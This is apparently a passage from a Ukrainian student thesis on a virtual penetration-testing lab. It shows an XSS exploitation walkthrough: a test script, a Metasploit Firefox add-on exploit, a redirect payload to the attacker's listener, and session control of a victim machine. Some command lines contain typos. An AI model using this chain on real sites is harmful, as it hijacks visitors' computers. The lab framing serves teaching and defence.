- •Анотація
- •Перелік умовних позначень
- •Розділ 1. Встановлення віртуальних тестових машин
- •Історія
- •Ключові можливості
- •Поточний стан
- •Категорії
- •Установка BackTrack
- •Р ис. 2. Загальний вигляд BackTrack 5 r3.
- •Коротко про ос
- •Встановлення FreeBsd
- •Налаштування спільних папок
- •Висновок до Розділу 1
- •Розділ 2. Встановлення віртуального тестового сервера
- •Установка Apache 2
- •Установка php 5
- •Установка MySql і його модулів для php 5
- •Форвард портів на маршрутизаторах tp-link
- •Резервування адреси
- •Зміна порту веб-управління маршрутизатором
- •Перекидування порту / Відкриття порту
- •Віддалене керування сервером
- •Р ис. 23. Створення облікового запису.
- •Р ис. 27. Монтування на клієнті.
- •Висновок до Розділу 2
- •Розділ 3. Тестування на надійність в середовищі віртуальної тестової лабораторії Тестування веб-сервера
- •Плагіни
- •Установка програми
- •Використання
- •Робота з веб-інтерфейсом
- •Тестування надійності засобів віддаленого управління
- •Тестування надійності ос, що встановлені у віртуальному тестовому середовищі
- •Використання вразливості xss
- •Висновок до Розділу 3.
- •Висновок
- •Список використаних джерел
Використання вразливості xss
Всі попередні сканери вразливостей виявили небезпечну вразливість XSS (XST). Експлуатація її дозволяє отримати повний доступ саме до користувача, який мав нещастя зайти на сайт, з цією вразливістю.
Суть заключається в тому, що при написанні повідомлення (наприклад на форумі), це повідомлення ніяк не ігнорується системою. Таким чином можна написати код, який виконаєтеся. Для перевірки вразливості, введем наступне:
<script>alert(“NO”)</script>
Рис. 47. Перевірка вразливості.
Рис. 48. Вразливість присутня.
При отриманні результату як на Рис. 13. можна переходити до наступного кроку. А саме – написання переадресації користувача з даного серверна, на інший, який спеціально конфігурований, щоб «зламати» користувача.
Для того, щоб не писати такий спеціально конфігурований сайт самому, можна скористатись засобами Metasploit. В BackTrack вводимо msfconsole та очікуємо на привітання програми.
use firefox_xpi_bootstrtapped_addon
set LSHOT 194.168.0.102
exploit
Рис. 49. Експлойт «Розширення для браузера».
Таким чином, отримали очікуваний веб-сервер, за адресою 192.168.0.102:7070/C6p8Hq5wPip
Повертаємось до вразливого сайту.
На місті alert вводимо наступне
<script>window.location = “192.168.0.102:7070/C6p8Hq5wPip”</script>
Оскільки форма відправки не дозволяє відправити більше, аніж 50 символів, потрібно у випадаючому меню, обрати «Дослідити елемент» та змінити значення.
Рис. 50. Переадресація користувача.
Тепер залишається лишень чекати, коли хтось перейде на сайт.
Після переходу, користувачеві буде пропоновано скачати розширення до браузера. Тут йде в хід соціальної інженерія.
Рис. 51. Активні сесії.
sessions –l
Виведе всі активні сесії, тобто користувачів, які перейшли за посиланням.
Перевіряєм чи справді все вдалось. Навмання вводимо команду. Dir – на ОС Windows виведе список папок.
Рис. 52. Успішне проникнення.
Висновок до Розділу 3.
В даному розділі розлянуто виявлення вразливостей. Насамперед це здійснюється за допомогою засобів ОС BackTrack. В даній ОС попередньо встановлена велика кількість потрібних сканерів.
Сканери вразливостей надсилають на досліджуваний сервер велику кількість даних, та аналізуються відповіді. Деякі сканери (Nesuss, VEGA) працюють більш жорстко, тобто їхнє сканування передбачає проникнення в систему. Тому їх використання повинне бути обдуманим, на не бути направленим на об’єкти, що не належать до досліджуваної групи. В противному разі сканування можна вважати спробою злому системи, та потягне за собою відповідну відповідальність.
Також в даному розділі розглянуто методи використання виявлених вразливостей. Це робиться для того, щоб перевірити, чи справді дана вразливість є небезпечною, а також, щоб зрозуміти дії зловмисника, та ефективно їх заблокувати. Такий підхід дозволить реально зрозуміти, як вразливість себе проявляє, та що є її першопричиною.
Потрібно пам’ятати, що сканування відбувається відповідно до попередньо створених баз. Це означає, що виявлені вразливості є виявленими тільки тому, що вони є відомими. Вразливості «нульового дня» – ще не виявлені, або недоступні широкому загалу, проте можуть бути використані зловмисниками. Захист від них можливий лише при детальному їх аналізі.
